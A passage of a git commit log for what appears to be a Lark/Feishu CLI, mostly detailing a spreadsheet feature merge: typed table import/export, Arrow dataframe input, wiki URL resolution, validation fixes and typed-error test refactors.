* feat: sync approval skill for meta api commands

* docs: fix approval skill reference links

* docs: restore approval reference links

* docs: align approval skill with review guidelines

* docs: clarify approval skill boundaries

* docs: remove implementation detail from approval description
2026-06-25 20:40:59 +08:00
Public Content Screenshot
d69761e205 fix(ci): reduce public content false positives 2026-06-25 20:23:15 +08:00
SunPeiYang996
7346de30b1 docs(lark-doc): restore style requirements (#1579)
Change-Id: I5c75a06ccac07586615c40db69b94d515f85d200
2026-06-25 19:18:05 +08:00
hanshaoshuai
cf93ee051c feat(ci): add public content safeguards 2026-06-25 19:03:14 +08:00
SunPeiYang996
fe32a6e0a9 feat(docs): support create title option (#1536)
* feat: support docs create title option

Change-Id: I6fd840fe813e5e664ea9ec680765fd41375cdebf

* docs: refine docs title guidance

Change-Id: I2f986a4606729bc791a1bff6c03aaa198b0798dc

* docs: keep lark doc skill create example

Change-Id: Ic7005e015c9e71a4582c1f4a8ac8222d552426d4

* test: allow docs create title flag in help

Change-Id: I0226e20c6bf2187eb6c4f0d2d5e37ab9225d4171
2026-06-25 18:05:47 +08:00
zhaojiaxing-coding
af9835c288 feat(drive): add +member-add shortcut with wiki space member collection collaborator support (#1204) 2026-06-25 17:45:42 +08:00
shifengjuan-dev
2e3073a532 docs(im): document chat.nickname get/update/delete (#1378) 2026-06-25 17:04:31 +08:00
liujiashu-shiro
1c92ed8841 feat: add im-markdown output for doc fetch (#1550)
* feat: add docs im-markdown fetch format

* refactor: tune docs im-markdown conversion

* test: expand docs im-markdown conversion coverage

* refactor: simplify docs im-markdown handlers

* test: cover docs im-markdown edge cases

* fix: expand doc im markdown tag downgrades

* fix: preserve blockquote paragraph breaks

* fix: handle im markdown nested tables and urls

* docs: document im markdown skill usage

* test: cover doc im markdown fetch

* test: strengthen doc fetch error coverage

* fix: fetch doc skill typo
2026-06-25 11:49:58 +08:00
cl900811
644c3c77dd doc(whiteboard):support export whiteboard as SVG and update whiteboard via SVG (#1559)
* feat(lark-whiteboard): update shortcut, support query or update whiteboard by svg

* feat(whiteboard): pin whiteboard-cli to v0.2.12 in lark-whiteboard skill

* fix(whiteboard): whiteboard shortcuts unit test

* fix(whiteboard): add whiteboard query shortcut unit test
2026-06-25 11:08:16 +08:00
xiongyuanwen-byted
bd898a1d74 feat(sheets): typed table I/O & error contract, workbook import/export, skill refresh (#1355)
* feat(sheets): add +sheet-show-gridline / +sheet-hide-gridline shortcuts

* docs(sheets): strengthen lark-sheets references for common editing pitfalls

Add targeted guidance to six lark-sheets references to reduce frequent
mistakes when editing spreadsheets through the CLI:

- write-cells: sanity-check units / dimension conversion / quantity factors
  before formula writes (formulas can run clean yet be off by a factor);
  keep derived output off original data columns to avoid clobbering source
- core-operations: prefer live formulas for derived values even when "live
  update" is not explicitly requested; scope rewrite/transform precisely so
  rows/columns that should stay unchanged are kept 1:1; treat header-stated
  format rules as checklist items; confirm the artifact file actually exists
  before finishing; write back bare values from local scripts
- visual-standards: apply border/header formatting on explicit request and
  identify the real header row; keep font size consistent with the source
- range-operations: keep total column width within A4 for printing
- read-data: dedup/compare long numbers via raw values, not csv formatted
  display (scientific notation collapses distinct numbers and causes false
  duplicates)
- chart: format date/number axes via source-cell number_format; place charts
  outside the data area so they do not cover existing data

* feat(sheets): implement table-put/table-get and sync skill specs

- Add lark_sheet_table_io.go with +table-put / +table-get and tests
- Refactor read-data; extend workbook; register new shortcuts
- Sync generated flag defs/schemas (go:embed) from sheet-skill-spec
- Sync skill references (write-cells numeric-column guidance, plus
  read-data / workbook / chart updates)

* docs(sheets): surface typed-write path at the write-decision point

Quick-ref table (SKILL.md, the first decision point) had no +table-put and
gated typed writes on "DataFrame", so a model holding a Counter/list/dict
would fall back to +csv-put and silently lose number/date fidelity.

- split csv-put row to plain-text values (no numeric/date semantics)
- add +table-put row for typed writes into an existing sheet
- add +workbook-create --sheets row for create + typed write in one shot
- add judgment note: number/amount/date/percent/count -> +table-put
  (or +workbook-create --sheets when the workbook does not exist yet);
  plain text -> +csv-put
- reframe write-cells scenario row to lead with numeric semantics
- point new-table writes at +workbook-create --sheets (one shot) instead
  of the create-empty-then-table-put two-step

Synced from sheet-skill-spec canonical (generate:cli + sync:cli).

* docs(sheets): sync SKILL.md (drop "not for local Excel" caveat)

Mirror the upstream sheet-skill-spec change removing the "not applicable to local Excel files" tail from the sheets skill and reference descriptions.

* docs(sheets): sync SKILL.md (drop "Feishu sheets only" caveat)

Mirror the upstream sheet-skill-spec change removing the "applies to Feishu sheets only" tail from the 14 sheet reference descriptions.

* feat(sheets): add +workbook-import wrapping the drive import core

Import a local xlsx/xls/csv as a new spreadsheet by delegating to the shared drive import flow with the target type pinned to sheet. Refactor drive +import to expose ImportParams / ValidateImport / PlanImportDryRun / RunImport (behavior unchanged, existing drive tests still cover it); sheets reuses them. Regenerate flag_defs_gen.go and sync the spec mirror.

* refactor(sheets): reuse the drive export core in +workbook-export

Replace +workbook-export's parallel export-task implementation with the shared drive ExportParams/RunExport core (pinned to type=sheet). Drops ~90 lines of duplicated poll/download code; +workbook-export now inherits drive's ctx cancellation, resume-on-timeout, filename sanitize/overwrite, and the full set of export status labels. The output contract aligns with drive's (adds ready/downloaded/doc_type; saved_path preserved). Also normalize an empty drive --output-dir to "." so drive +export behavior is unchanged, and fix the sheets export e2e to call +workbook-export instead of a nonexistent +export.

* docs(sheets): keep original column widths; align chart axis with requested metric

- range-operations: only widen new / overflowing columns; never recompute or
  shrink the widths of existing columns (any blanket resize, even by 1px,
  breaks the original visual format)
- chart: when the user asks for a share / percentage, the value axis should be
  a percentage (pie, or stack.percentage on bar/column) rather than raw counts

* docs(sheets): reword guidance to avoid eval-specific phrasing

Replace scoring-framework wording in the examples with plain functional
consequences (e.g. "not delivered", "goes stale when the source changes",
"breaks the original visual format"), so the references stay agent-facing.

* docs: add lark sheets financial modeling guidance

* docs(sheets): align write-cells reference with the generated output

Bring the hand-applied write-cells example in line with the spec-generated
reference so the CLI mirror is byte-identical to the canonical source.

* docs(sheets): align +csv-put help with formula support

Sync the formula-support wording from sheet-skill-spec (flag-defs, skill
references) and update the hand-authored cobra Description and comment for
+csv-put. +csv-put evaluates a leading-= cell as a formula via
set_range_from_csv; descriptions only, no behavior change.

* docs(sheets): fix invalid +dim-insert example in chart reference

The chart reference's placement example used non-existent flags
--dimension/--start/--end for +dim-insert. The real signature is
--position (required) + --count (required); copying the example
fails Validate with "--position is required". Replace it with
+dim-insert --position V --count 6 (insert 6 columns before V,
i.e. after U), aligning with the sheet-structure reference.

* docs(sheets): chart coordinate base / quoting + filter condition enums

Sync three reference-doc corrections from the spec source:

1. chart: label position.row as 0-based (first row = row:0), distinct
   from the 1-based row numbers used by A1 ranges and +dim-insert
   --position, removing the row-base ambiguity.

2. chart: convert the three runnable examples whose JSON contains a
   quoted sheet prefix ('Sheet1'!A1) from inline single-quoted
   --properties '{...}' to a stdin heredoc (--properties - <<'JSON').
   Inside an inline single-quoted string bash strips the inner quotes
   around the sheet name (and splits names with spaces into words),
   corrupting the JSON; a quoted heredoc delimiter performs no shell
   substitution and preserves it. Adds a short note on the pitfall.

3. filter / filter-view: add the full conditions[].type x compare_type
   enum table (text / number / multiValue / color and their respective
   compare_type values and values shape), and call out the
   equals/notEquals (with s) vs equal/notEqual (no s) gotcha. The docs
   previously only showed two values via examples.

* docs(sheets): label +sheet-create --index as 0-based

The base flag description for +sheet-create's --index omitted the
coordinate base, while its siblings +sheet-move ("Target position
(0-based)") and +sheet-copy already state 0-based. Align the description
so the index base is unambiguous. Synced from the spec source
(flag-defs.json + workbook reference).

* fix(sheets): regenerate flag defs and fix asasalint in table io

* feat(sheets): add counta to chart aggregateType enum

Add `counta` (count non-empty cells, incl. text) to manage_chart_object
dim2.series[].aggregateType in the chart flag schema. `count` only counts
numeric cells, so counting occurrences of a text/category column renders an
empty chart; `counta` enables category frequency counts. Synced from the
sheet-skill-spec canonical schema.

* feat(sheets): make --target-position and --range mutually exclusive on +pivot-create

Both flags map to the same wire field (properties.range), so passing
non-default values for both is ambiguous. Mirror the
--target-sheet-id / --target-sheet-name mutex pattern: --target-position
takes priority over --range, and supplying both with non-default values
is rejected up front with a typed FlagErrorf. --target-position=A1 is
the documented default and is treated as "not set".

Add a symmetric validateCreateInput hook on objectCRUDSpec (alongside
the existing validateUpdateInput), wire it into objectCreateInput, and
inject the pivot-specific check on pivotSpec.

* feat(sheets): rework +workbook-create flags and --styles

- --values builds a type-less typed payload, writing through --sheets' batched set_cell_range path (raw passthrough preserves auto-detect; large tables batch; big ints via json.Number)
- drop --headers (subsumed by --values first row) and --header-style (typed header no longer auto-bold; use --styles instead)
- styles: deep-merge overlapping cell_styles/border_styles fields (was wholesale-replace which dropped fields); add manual border_styles validation (style/weight enums + sides) since --styles is on parseJSONFlagSkip and bypasses the schema validator
- regenerate flag-defs/flag-schemas/skills mirror from sheet-skill-spec (--styles flag + full per-side border schema)

* fix(sheets): add mention_type enum to set_cell_range cells schema

Constrain rich_text mention_type to the proto MENTION_FILE_TYPE set so a
file @mention with an out-of-enum value (e.g. 6 = cloud shared folder) is
rejected by the schema validator before it reaches the server and fails
pb serialization ("mentionFileInfo.fileType: enum value expected").

- data/flag-schemas.json: mention_type gains enum + per-value description
- lark_sheet_write_cells_test.go: cover reject (6) + allow (0 / 2 / 22)

* feat(sheets): implement pandas-split --sheets protocol for +table-put/+table-get/+workbook-create

Synced from sheet-skill-spec canonical (cli:table_put schema +
references). +table-put/+workbook-create accept the new shape via a
tableSheetIn -> tableSheetSpec normalize step (dtype string -> internal
type/format mapping). +table-get emits the same shape so the writer's
df_to_sheet and the reader's sheet_to_df round-trip cleanly.

isoDateToSerial now accepts the full ISO datetime form
(2024-01-15T00:00:00.000, including timezone suffixes) emitted by
df.to_json(date_format="iso"), not just yyyy-mm-dd. End-to-end verified
by the spec repo's contracts/python_helper_roundtrip script against a
real Lark spreadsheet on pandas 2.2 and 3.0.

* feat(sheets): add --dataframe Arrow IPC input for +table-put/+table-get/+workbook-create

Introduce a binary-typed twin of --sheets: --dataframe accepts an Arrow IPC
(Feather v2) payload that pandas' df.to_feather() writes, deriving dtypes and
per-column number formats from the Arrow schema. The two producers are mutually
exclusive and funnel through a shared resolver so +table-put and
+workbook-create stay in lockstep; +table-get gains --dataframe-out for
single-sheet reads. Also auto-grow a sub-sheet's row/column count before
writing so blocks past the backend's default 200x20 bounds no longer fail with
range-exceeds-sheet-bounds.

* docs(lark-sheets): remove financial modeling standards reference

Drop the lark-sheets-financial-modeling-standards.md reference doc and all
pointers to it from SKILL.md, core-operations, and visual-standards. Bump
skill version to 3.0.0.

* docs(lark-sheets): clarify cell-image vs float-image routing and fix reference self-references

Synced from sheet-skill-spec.

- Add a binding-based decision (does the image belong to a record and move with its row?) to route +cells-set-image vs +float-image-create across the SKILL entry, float-image and write-cells references.
- Add routing rows to the SKILL command cheat-sheet and warn against defaulting to float-image out of familiarity.
- Replace mislabeled 本 skill / 子 skill / 跨 skill wording in references with 本文 / reference names, matching the existing convention.

* feat(sheets): add --styles to +table-put for one-step typed write with styling

+table-put now accepts --styles (same shape as +workbook-create's --styles):
cell_styles merge into the set_cell_range matrix, while cell_merges /
row_sizes / col_sizes apply as their own tool calls after the write. The
styles payload is name-matched against the written sheets and validated up
front, so a malformed or mismatched style fails before any write lands.

Also points +sheet-create users to +table-put (auto-creates missing sheets)
when they need data/styles, via a runtime Tip and the lark-sheets skill
references. Flag is sourced from the upstream Base table and regenerated
through sheet-skill-spec (flag-defs.json / flag-schemas.json / gen file).

Adds unit tests (dry-run styles, name-mismatch reject, execute) and a
dry-run E2E (tests/cli_e2e/sheets/sheets_table_put_dryrun_test.go).

* docs(lark-sheets): point read-data to +sheet-info for hidden row/col identification

skip-hidden defaults to false (lossless reads), but the read primitives don't mark which rows/cols are hidden. Cross-reference +sheet-info --include hidden_rows,hidden_cols + row_indices/col_indices so agents can identify hidden ranges when they need to filter or interpret hidden data.

Synced from sheet-skill-spec.

* feat(sheets): document link requirement for @document mentions in cells flag schema

@document mentions (mention_type != 0) must pass link (doc URL) to render a
clickable card; @user mentions (mention_type=0) don't need it. Synced from the
upstream tools-schema.

* fix(sheets): reject cond-format attrs whose shape mismatches rule_type

A conditional-format rule created with --rule-type colorScale but
cellIs-shaped attrs ({compare_type,value}, no color) was accepted by
the CLI and written through to the server, producing a color-less
color-scale segment. That dirty data crashes the frontend on snapshot
deserialization, so the spreadsheet can no longer be opened (5005).

The per-entry schema check can't catch this: properties.attrs.items is
a oneOf over all nine attr shapes and passes as soon as any branch
matches, blind to the sibling rule_type — {compare_type,value} matches
the cellIs branch even when rule_type says colorScale. The tool side
maps attrs blindly by rule_type and only validates dataBar count and
iconSet ordering, so the gap reaches the data layer.

Add a cross-field validator (validateCondFormatAttrs) wired into both
create and update via the new objectCRUDSpec.validateCreateInput hook
(twin of validateUpdateInput). It enforces, per rule_type, the keys
every attrs entry must carry — mirroring the tool's converter contract
— and treats an empty required string (notably color) as missing.
Rule types that take no attrs (duplicateValues / uniqueValues /
containsBlanks / notContainsBlanks) and updates that omit rule_type are
left to the server.

* test(sheets): guard condFormatAttrsRequired against flag-schemas drift

Add TestCondFormatAttrsRequired_MatchesSchemaOneOf, comparing the
hand-maintained condFormatAttrsRequired table against the embedded
flag-schemas.json attrs oneOf (multiset of required-key sets, for both
create and update). The cross-field validator only holds if its
per-rule_type required keys mirror the schema branches, and the two
share no compile-time link — this pins them together so a future schema
sync that adds/drops a required key can't silently desync the table.

* fix(sheets): default +table-get to full used range, not A1 current region

+table-get without --range anchored its current_region probe at A1, so an
internal blank row or column silently truncated everything past it — agents
then treated the partial data as complete (the pro016 / pro025 incident).

- Probe the used range over the full physical grid (row_count × column_count
  from the workbook structure) so it spans internal blank rows/columns; fall
  back to the legacy A1 anchor when dimensions are unknown.
- Emit the actually-read `range` on every sheet so callers can detect
  truncation (get_cell_ranges has no has_more flag).
- Fix the same A1-anchor bug in append mode's last-data-row probe, which could
  otherwise overwrite data past an internal blank row.
- Add unit + dry-run/live E2E coverage; refresh synced skill docs.

* docs(sheets): fix csv-get current_region guidance to cross-check row_count

current_region is a blank-row/column-bounded block, not the true sheet extent:
an internal blank row truncates it, so it can miss rows past the gap. The
read-data reference previously called it the "真实数据边界" and told agents to
prefer it over row_count — which drove the "read only to current_region's last
row, miss the tail" failure.

- current_region: warn it can be both smaller (internal blank rows truncate)
  and larger (trailing summary/signature rows) than the real data range.
- csv-get output contract: clarify its row_count/col_count is the returned size
  (= actual_range), not the physical sheet size; has_more only reflects the
  current range, not whether the whole sheet was read.
- "确定数据范围的正确流程": add a step to cross-check against +workbook-info's
  physical row_count and probe past current_region's last row for data beyond an
  internal blank row.

* fix(sheets): collapse duplicate validateCreateInput from bad merge resolution

A prior merge kept both branches' independently-added validateCreateInput
fields on objectCRUDSpec with conflicting signatures (pivot's
func(rt, input) and cond-format's func(input)), plus both call sites in
objectCreateInput, which failed to compile (validateCreateInput redeclared).

Collapse to the single richer func(rt flagView, input) signature and one
call site. cond-format's validateCondFormatAttrs (func(input), still shared
with validateUpdateInput) is wrapped in a closure that ignores rt. Both
behaviors are preserved: pivot --target-position/--range mutex and
cond-format attrs-shape-vs-rule_type validation.

* refactor(sheets): migrate legacy error helpers to typed errs in sheets domain

golangci-lint forbidigo (errs-no-legacy-helper / errs-no-bare-wrap) flagged
the table I/O, workbook, and dataframe shortcuts that landed on this branch:
93 common.FlagErrorf and 48 fmt.Errorf calls.

- Replace every common.FlagErrorf with common.ValidationErrorf (typed
  *errs.ValidationError, same signature) across workbook / table_io /
  dataframe / object_crud.
- writeDataframeOut's two final --dataframe-out write failures become typed
  errs.NewInternalError(SubtypeFileIO, ...).WithCause(err).
- applyWorkbookCreateVisualOps now passes the typed callTool error through
  unchanged (re-wrapping would downgrade classification) and attaches the
  failing op as a recovery hint only when none is set.
- The remaining fmt.Errorf are genuine intermediate errors that the command
  layer re-wraps into typed validation errors (buildTypedCell / Arrow
  decode-encode) or surfaces as a partial_success message string
  (writeTypedSheets via tablePutPartial); each carries a //nolint:forbidigo
  with that reason, per the lint guidance.

No behavior change: error messages and partial-success shapes are preserved;
gofmt, go vet, golangci-lint (0 issues) and sheets tests all pass.

* fix(shortcuts): clarify single-stdin constraint in flag help and error hint

Input flags advertised '(supports @file, - for stdin)' per flag, leading
AI agents to write '--a - <x --b - <y' where the second '<' silently
clobbers the first and the first flag reads the wrong payload. A process
has a single stdin, so at most one flag per call can use '-'.

- Reword the generated help hint to '- reads stdin (one flag per call;
  use @file for others)'.
- Add an actionable .WithHint to the stdin-conflict validation error
  pointing callers to @file for the extra flags.
- Assert the new hint in TestResolveInputFlags_DuplicateStdin.

* feat(sheets): +cells-get/+csv-get --max-chars 默认值 200000 → 500000

放宽默认防爆上限。flag_defs_gen.go 由 go generate 重生;flag_defs_test.go
的 expected default 同步;flag-schemas.json schema_version 2 → 3 是上游
spec-tables 架构调整带来的元数据 bump,与本业务改动无关、go:embed 不解析
该字段、无功能影响。

Synced from sheet-skill-spec@93f7a78.

* docs(lark-sheets): sync from spec — +csv-put 含逗号公式正例 + 收敛警示标签

源同步自 sheet-skill-spec:write-cells 补含逗号公式 RFC 4180 转义正例与结构化写入优先指引;全 reference 收敛「高频致命错误」类标签。

* docs(lark-sheets): sync from spec — --max-chars 放出为可见 flag + 落盘优先指引

源同步自 sheet-skill-spec:--max-chars 放出(默认 500000,可调小避免大输出被 Bash/终端转存为文件、改 has_more 分页);read-data 增「大数据优先落盘」指引。

* feat(sheets): 写操作报错增强 + --token 别名

- 复合 JSON shape 校验失败时报错附 --print-schema 提示,agent 可直接拿到精确结构(pro26 头号:+cells-set --cells 反复猜 shape)
- JSON 解析失败且该 flag 支持 stdin 时提示改用 stdin(公式/引号/逗号内联到 shell 被转义弄坏 JSON)
- --token 作为 --spreadsheet-token 的解析期别名:复用 sheets 已有 PostMount 钩子 + pflag normalize,仅 sheets 包,common 零改动

* docs(lark-sheets): sync from spec — set+H 改单引号 / 速查表补臆造命令名 / workbook-import 引导

* fix(sheets): migrate +table-put to typed error contract

The merge from main brought in #1449 (retire legacy error envelopes),
which removed output.ExitError / output.ErrDetail and forbids
constructing them. Port tablePutPartial off the legacy envelope:

- no sheets written -> typed errs.APIError (plain failure)
- some sheets written -> ok:false result via runtime.OutPartialFailure
  carrying written_sheets, returning the partial-failure exit signal

Also fix two drifts the same merge introduced:
- regenerate flag_defs_gen.go to match the committed flag-defs.json
- update the --max-chars flag test to assert visible (no longer hidden)

* docs(lark-sheets): sync from spec — set+H 告诫通则化(移入 stdin 段)

* feat(sheets): styles 接受 halign/valign 等对齐字段别名

把模型常幻觉的 horizontal_align / halign / vertical_align / valign 映射到
规范字段 horizontal_alignment / vertical_alignment,覆盖 --styles 与 typed
--cells;与规范字段冲突时报错而非静默择一。同步 lark-sheets skill 文档补
对齐字段说明 + --print-schema --flag-name styles 提示。

* feat(sheets): resolve wiki URLs to the backing spreadsheet for --url

Sheets shortcuts only accepted /sheets/ and /spreadsheets/ URLs via --url.
A /wiki/<node_token> URL was rejected with "must be a spreadsheet URL"
because the wiki node_token is not a spreadsheet token: resolving it to the
backing spreadsheet needs a wiki get_node call, which Validate/DryRun (kept
network-free) must not make.

Mirror the existing slides/doc/drive two-stage pattern:

- parseSpreadsheetRef classifies --url / --spreadsheet-token network-free
  into a sheet token or an (unresolved) wiki node_token.
- resolveSpreadsheetTokenExec (Execute only) resolves a /wiki/ node_token
  via wiki get_node, verifies obj_type=sheet, and returns the obj_token.
  The wiki:node:read scope is enforced on this path only, so non-wiki
  invocations are unaffected.
- resolveSpreadsheetToken stays network-free for Validate/DryRun, passing
  the node_token through unchanged.

All 47 Execute paths (including +batch-update and +workbook-export) switch
to the Exec resolver; Validate/DryRun keep the network-free one. No tool
schema change: the CLI feeds the resolved spreadsheet token as excel_id, so
this is a pure CLI-layer change.

Tested: unit (parse classification + wiki get_node e2e via httpmock) and
live end-to-end against a real wiki spreadsheet (read: +workbook-info,
+cells-get, +csv-get; write: +sheet-create, +sheet-rename, +csv-put).

* docs(sheets): note --url accepts wiki URLs (synced from spec)

* fix(sheets): match --url path segment via url.Parse, not substring

parseSpreadsheetRef classified /wiki/ with strings.Index over the whole URL, so a /sheets/ link whose query or fragment merely contained /wiki/ (e.g. .../sheets/sht?from=/wiki/x) was hijacked into a get_node call. Now parse the URL and match /sheets/, /spreadsheets/, /wiki/ only as a path prefix, mirroring slides parsePresentationRef which already fixed this class. Drop the substring helpers. Also align wiki resolution with slides: CallAPITyped (typed error + log_id) and classify an incomplete get_node response as InternalError instead of a --url validation error. Add regression tests for query/fragment /wiki/ and incomplete node.

* fix(sheets): satisfy errorlint/copyloopvar + regen flag defs

- helpers_test.go: drop the Go 1.22+ redundant `tc := tc` loop copy
  (copyloopvar).
- lark_sheet_dataframe.go, lark_sheet_table_io.go: switch the
  intermediate-error fmt.Errorf calls from %v to %w so errorlint passes.
  Behavior unchanged — these errors are always rewrapped into typed
  validation errors at the command layer.
- flag_defs_gen.go: regenerate from data/flag-defs.json (drift from the
  wiki-URL merge).

* ci: allow Apache Arrow module in license check

Arrow is Apache-2.0 overall, but it vendors c-ares (LicenseRef-C-Ares,
ISC-like) inside the module which go-licenses classifies as Unknown and
the strict disallowed_types=...,unknown gate rejects.

Pass --ignore github.com/apache/arrow/go/v17 since Arrow is required by
sheets +table-put / +table-get / +workbook-create --dataframe (Arrow IPC
ingest) and the vendored c-ares is not redistributed by us.

* fix(sheets): resolve wiki URL in +range-move/+range-copy Execute

transformExecuteFn (the named Execute helper shared by +range-move and +range-copy) still called the network-free resolveSpreadsheetToken, so a /wiki/ URL reached transform_range as an unresolved node_token and failed. #1519's sweep over Execute hooks only rewrote inline closures; this is the only Execute backed by a named helper. Switch it to resolveSpreadsheetTokenExec (Validate/DryRun stay network-free) and add a +range-move wiki-URL regression test.

* refactor(sheets): drop +table-put manual capacity grow; rely on set_cell_range auto-grow

set_cell_range now auto-grows the sub-sheet to fit the write, so the
ensureSheetCapacity helper (and its modify_sheet_structure dim-insert
call before each write) is no longer needed. This also closes a data-
safety hole flagged in review: inserting before the last existing row
could push real data down into the area set_cell_range was about to
write, and allow_overwrite=false could not protect against it because
the structural insert had already mutated the sheet by the time the
write-collision check ran.

Verified end-to-end against a real spreadsheet: +table-put writing
300x25 into a fresh Sheet1 (default 200x20) succeeds in one write and
the sheet ends up 301x25.

* fix(sheets): close --dataframe stdin guard hole

--dataframe is binary and bypasses the common Input resolver, which is
where the existing single-stdin guard lives. Result: an invocation like
+table-put --dataframe - --styles - was accepted, then one of the two
consumers raced for stdin and the other silently saw an empty stream.

Add a stdinConsumed marker on RuntimeContext that both consumers share:
common.resolveInputFlags sets it when an Input flag uses '-', and
readDataframeBytes both checks and sets it. A second consumer is
rejected up front with an actionable hint pointing at @file.

Flagged in code review (lark_sheet_dataframe.go:93).

* fix(sheets): harden +table-put / +table-get input validation and round-trip safety

Four review-flagged correctness gaps in table I/O, all bundled because
they touch the same file:

1. --sheets accepted trailing data after the first JSON value
   (json.Decoder does not surface that, unlike json.Unmarshal). A new
   decoderExpectEOF helper rejects e.g. `--sheets '{...} oops'` with a
   typed validation error instead of letting the leading object pass
   through and surface as a confusing downstream failure.

2. +table-get with a duplicate header (e.g. `amount, amount`) used to
   read back successfully — the dtypes map silently collapsed to one
   entry — and only failed later on +table-put because the writer
   rejects duplicate column names. Fail fast at read time with an
   actionable hint to rename or pass --no-header. --no-header mode is
   exempt (fallback col<N> names are always unique).

3. +table-put dry-run rendered an invalid range like A1:C0 when
   header=false with rows=[]. tablePutFullRange returns "" for an
   empty matrix or zero columns instead of building a degenerate
   rectangle.

4. +table-get with --sheet-id and a get_workbook_structure miss (read
   failure or selector mismatch) used to return a target with
   name="", which then broke +table-get → +table-put round-trip (the
   writer requires a non-empty sheet name). Fall back to using the id
   as the name.

End-to-end verified against a real spreadsheet: trailing data, duplicate
header, and --no-header fallback all behave as advertised.

* fix(sheets): apply +workbook-create style-only ops instead of silently dropping them

A +workbook-create call carrying only cell_merges / row_sizes / col_sizes
(no --values / --sheets and no cell_styles) used to create the workbook
but silently drop the requested visual ops. Two reasons, both fixed:

- workbookCreateStyleDimensions only counted cell_styles when computing
  the write extent, so cell_merges / row_sizes / col_sizes always
  contributed 0 → buildValuesPayload returned a nil payload → Execute
  skipped writeTypedSheets entirely → no visual ops ran. Extend the
  helper to fold the merge / resize ranges in.

- Pure row_sizes / col_sizes payloads can never expand a cell rectangle
  (they are dimension ranges, not cell ranges), so even with the extent
  fix Execute would still skip the write path. Add a no-data branch:
  when payload == nil but a styles item is present, look up the default
  sheet and apply visual ops directly via applyWorkbookCreateVisualOps.
  The dry-run plan mirrors this so the preview shows the visual ops.

Also picks up the --values trailing-JSON-data EOF check (mirror of the
--sheets one in lark_sheet_table_io.go).

End-to-end verified against a real spreadsheet: a cell_merges-only
+workbook-create now produces a sheet with merged_cells_count: 1.

* fix(sheets): preserve causes and render messages cleanly for typed validation errors

common.ValidationErrorf goes through fmt.Sprintf, which does not support
%w — the seven call sites that used `%w` were rendering the cause as
literal `%!w(*fmt.wrapError=&{...})` and dropping the cause from the
typed-error chain (so callers couldn't errors.As back to the underlying
error).

Switch each to `%v` for clean rendering and attach the cause via
.WithCause(err) so the typed contract is preserved. Touched call sites:

- lark_sheet_dataframe.go: --dataframe Arrow decode / stdin read / file
  read failures (3 call sites).
- lark_sheet_table_io.go: --sheets invalid JSON, payload-validate
  per-cell coercion error, buildSheetMatrix per-cell error,
  --dataframe-out arrow encode failure (4 call sites).

End-to-end verified against a real spreadsheet: both invalid-JSON and
typed-cell errors now render readable messages instead of %!w(...).

* sync(sheets): pick up +sheet-{show,hide}-gridline in +batch-update schema

Mirror of the sheet-skill-spec change adding the two gridline shortcuts
to cli-schemas.json batch_update.operations.shortcut enum. Synced from
the upstream canonical via generate:cli + sync:cli.

Verified end-to-end on a real spreadsheet — +batch-update with a
+sheet-hide-gridline op passes schema validation and the backend run
returns succeeded: 1.

* sync(sheets): pick up +workbook-export UX clarification from spec

Mirror of the sheet-skill-spec update that documents +workbook-export's
default-no-download behavior and its relationship to drive +export
--doc-type sheet. Synced from canonical via generate:cli + sync:cli +
go generate.

End-to-end verified against a real spreadsheet:
- Omit --output-path → ok:true, downloaded:false, file_token returned
- Pass --output-path ./crfix_test.xlsx → ok:true, file saved
  (17892 bytes), saved_path returned

The --help output for +workbook-export now states the default behavior
and points callers at `drive +export --doc-type sheet` when they need
the --output-dir / --file-name / --overwrite split.

* test(sheets): assert typed errs.Problem instead of err.Error() substrings

Per the coding guideline "Error-path tests must assert typed metadata via
errs.ProblemOf (category / subtype / param) and cause preservation, not
message substrings alone." — sweep through every error-path assertion in
the sheets domain and replace the
`strings.Contains(stdout+stderr+err.Error(), ...)` pattern with two
small helpers landed in helpers_test.go:

  requireProblem(t, err, wantCategory, wantSubtype, msgContains)
    -> *errs.Problem
  requireValidation(t, err, msgContains)
    -> *errs.ValidationError   // shorthand for CategoryValidation +
                               //   SubtypeInvalidArgument; lets callers
                               //   also assert .Param / .Params / .Cause

~60 assertion sites across 18 test files now check the typed envelope
shape, with message-substring checks moved onto the returned Problem
(.Message / .Hint / .Param). The substring is preserved as a sanity
check rather than the sole assertion, so a category drift like
validation → internal would now fail loudly instead of slipping past.

Cases intentionally left as substring (each with a one-line reason):
  - Errors that come straight from cobra's native flag parser (untyped
    *errors.errorString — e.g. "required flag(s) ... not set", mutually-
    exclusive groups). Re-typing these needs a custom FlagErrorFunc and
    is out of scope here.
  - Intermediate errors from decodeArrowToSheet that the caller wraps
    into a typed envelope (`//nolint:forbidigo` reason). Those unit
    tests assert the unwrapped intermediate directly.

One production tweak:
  - shortcuts/sheets/flag_schema.go: printFlagSchemaFor returns typed
    *errs.ValidationError (with WithParam("--flag-name") on the
    unknown-flag branch) instead of raw fmt.Errorf. The framework
    already wraps this when called via --print-schema, so user-facing
    behaviour is unchanged; direct callers (and tests) now get the
    typed envelope.

Verified: go test ./shortcuts/sheets/... passes; golangci-lint
--new-from-rev=origin/main reports 0 issues.

* test(common): assert typed errs.Problem instead of err.Error() substrings

Mirror of the sweep just landed in shortcuts/sheets: replace error-path
substring assertions with typed-envelope checks via two small helpers
landed in a new shortcuts/common/typed_error_assertions_test.go:

  requireProblem(t, err, wantCategory, wantSubtype, msgContains)
    -> *errs.Problem
  requireValidation(t, err, msgContains)
    -> *errs.ValidationError   // shorthand for CategoryValidation +
                               //   SubtypeInvalidArgument; lets callers
                               //   also assert .Param / .Params / .Cause

8 sites moved to typed assertions across runner_jq_test.go,
mcp_client_test.go, drive_media_upload_typed_test.go, and
runner_input_test.go (the input tests already used a typed-param helper;
this just retargets the substring follow-up onto the typed Message).

Sites intentionally left as substring + comment (production returns raw
fmt.Errorf, not a typed envelope):
  - runner_botinfo_test.go (6 sites): BotInfo / fetchBotInfo wrap upstream
    errors with fmt.Errorf so the SDK-level message ([99991], 403,
    invalid character, etc.) shows through.
  - runner_args_test.go (4 sites in 2 tests): rejectPositionalArgs returns
    raw fmt.Errorf to satisfy cobra's PositionalArgs contract.
  - permission_grant_test.go (2 sites): assert on stderr / hint strings,
    not error messages — already out of the err.Error() substring class.

No production code changes.

Verified: go test ./shortcuts/common/... passes;
golangci-lint --new-from-rev=origin/main ./shortcuts/common/... reports
0 issues.

* fix(sheets): plug four +table-put / +table-get correctness gaps flagged in CR

Four review-flagged bugs, all in lark_sheet_table_io.go (bundled because
they touch the same file and the same +table-put / +table-get domain):

1. +table-get --dry-run dropped the --sheet-id / --sheet-name selector
   from the get_cell_ranges body, while Execute always passed it. Agents
   that validate the dry-run shape and then run live would see a request
